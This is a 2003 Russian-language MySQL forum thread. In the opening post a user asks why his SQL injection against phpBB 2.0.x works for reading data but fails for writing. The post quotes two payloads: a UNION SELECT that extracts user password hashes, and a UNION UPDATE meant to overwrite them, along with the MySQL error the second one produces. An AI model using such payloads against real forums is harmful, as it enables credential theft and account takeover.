|
MySQL.RU - Webboard
Вернуться
SQL иньекция в в phpBB 2.0.х (Terabyte) 06/12/2003 - 18:26:08
Re: SQL иньекция в в phpBB 2.0.х (walrus) 07/12/2003 - 17:21:15
Re: SQL иньекция в в phpBB 2.0.х (Andy Zubov) 10/12/2003 - 12:47:47
From: Terabyte - 06/12/2003 - 18:26:08
Subject:SQL иньекция в в phpBB 2.0.х
-----------------
Вопрос будет по уязвимости - http://www.securitylab.ru/41501.html
комманда:
1 union SELECT user_password FROM phpbb_users union SELECT search_array FROM phpbb_search_results WHERE search_id = 1
проскакивает, а вот:
1 union update phpbb_users set user_password=1 union SELECT search_array FROM phpbb_search_results WHERE search_id = 1
пишет странную ошибку:
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'update phpbb_users set user_password=qwe13/* AND sessio
Тещу на локалхосте с мскулом 4,* где union должно работать. В чем дело?
[Это сообщение - спам!]
Последние сообщения из форума
Уважаемые посетители форума MySQL.RU!
Убедительная просьба, прежде чем задавать свой вопрос в этом форуме, обратите внимание на разделы:
- ответы на наиболее часто задаваемые вопросы - FAQ
- раздел документация
- раздел поиск по сообщениям форума и документации
Также, старайтесь наиболее подробно указывать свою ситуацию (версию операционной системы, версию MySQL,
версию программного обеспечения, по которому возникает вопрос, текст возникающих ошибок, и др.)
Помните, чем конкретнее Вы опишете ситуацию, тем больше шансов получить реальную помощь.
12137
|
|